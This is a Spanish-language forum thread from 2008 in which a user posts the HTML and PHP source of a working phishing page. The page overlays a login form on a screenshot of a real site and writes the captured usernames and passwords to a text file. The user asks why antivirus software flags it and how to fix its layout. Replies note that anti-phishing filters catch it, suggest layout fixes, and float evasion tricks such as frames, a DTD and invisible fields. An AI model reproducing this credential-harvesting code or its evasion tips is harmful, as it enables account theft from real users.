elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Pagina PHP/HTML antivirus y problemas...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Pagina PHP/HTML antivirus y problemas...  (Leído 1,752 veces)
ruben_new

Desconectado Desconectado

Mensajes: 97


Ver Perfil
Pagina PHP/HTML antivirus y problemas...
« en: 2 Mayo 2008, 15:40 pm »

Buenas tardes, tengo un problema, hice una pagina en html "imitando" otra, de tal forma que cogí la pagina original hice una captura de pantalla y la puse como fondo de mi pagina, luego en lugar de la imagen donde esta para meter usuario y contraseña puse yo "encima" otro formulario donde se pueda escribir y luego un botón de iniciar sesión nuevo.

El problema es que hay gente que me dice al entrar a la web que le salta el antivirus... se me hace muy raro (Ahora os pego el código de la web) también tengo otro problema y es que al abrirlo con el internet explorer 7 digamos que no es lo mismo que abrirlo con firefox porque el fondo no tiene la misma posición, sigamos que se mueve de sitio y lo que yo añado encima se descoloca de la pagina (El formulario y el botón de iniciar sesión) como podría solucionar eso? para que en todos exploradores se viera igual la posición del fondo de la web (captura de pantalla de la web original) y mis formularios (añadidos encima de la captura) ??

Y por ultimo en internet explorer 7 me sale un mensaje para permitir la ejecución de la pagina algo como que no reconoce el software de edición html.

Aquí el código:

Código:
<html>
<body background="fondo.jpg">
<form action="procesa.php" method="GET">
<input name="usuario" type="text" size="43"/>
<input name="password" type="password" size="43"/>
<input type="submit" value="Iniciar Sesión">
</form>
</body>
</html>

y la php:

Código:
<html>
<body background="error.jpg">
<?
$user=$_GET[usuario];
$pass=$_GET[password];
?>

<?php
$nombre_archivo = 'pass.txt';
$contenido = "$user////$pass";

if (is_writable($nombre_archivo)) {

if (!$gestor = fopen($nombre_archivo, 'a')) {
echo "";
exit;
}

if (fwrite($gestor, $contenido) === FALSE) {
echo "No se puede escribir al archivo ($nombre_archivo)";
exit;
}

echo "";
fclose($gestor);
} else
{
echo "";
}
?>
</body>
</html>

Cualquier ayuda y/o consejo sera agradecido ;)


En línea

SirLanceCC


Desconectado Desconectado

Mensajes: 1.093


Ver Perfil WWW
Re: Pagina PHP/HTML antivirus y problemas...
« Respuesta #1 en: 5 Mayo 2008, 20:21 pm »

Por lo que pretendes hacer... si salta el entivirus... es hasta normal, no?
Luego con lo de la imagen... va a hacer la web muy pesada, pero puedes usar uno  o varios divs con posición absoluta...


En línea

ruben_new

Desconectado Desconectado

Mensajes: 97


Ver Perfil
Re: Pagina PHP/HTML antivirus y problemas...
« Respuesta #2 en: 6 Mayo 2008, 20:15 pm »

pos no veo normal que por ese código salte el antivirus... si pensara que es normal no podría este mensaje ^^
En línea

SirLanceCC


Desconectado Desconectado

Mensajes: 1.093


Ver Perfil WWW
Re: Pagina PHP/HTML antivirus y problemas...
« Respuesta #3 en: 7 Mayo 2008, 02:54 am »

 :¬¬
Filtros anti phishing te suenan?
Bueno yo sólo digo que es posible y de esperarse...
En línea

ruben_new

Desconectado Desconectado

Mensajes: 97


Ver Perfil
Re: Pagina PHP/HTML antivirus y problemas...
« Respuesta #4 en: 7 Mayo 2008, 16:39 pm »

Gracias, he leído algo de que se puede saltar con frames? leeré todo bien.

Un saludo
En línea

Syphroot

Desconectado Desconectado

Mensajes: 268


All You Need To Do Is Follow The Worms


Ver Perfil WWW
Re: Pagina PHP/HTML antivirus y problemas...
« Respuesta #5 en: 12 Mayo 2008, 06:44 am »

Prueba a añadir el DTD del documento y añade campos invisibles o tags invisibles
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines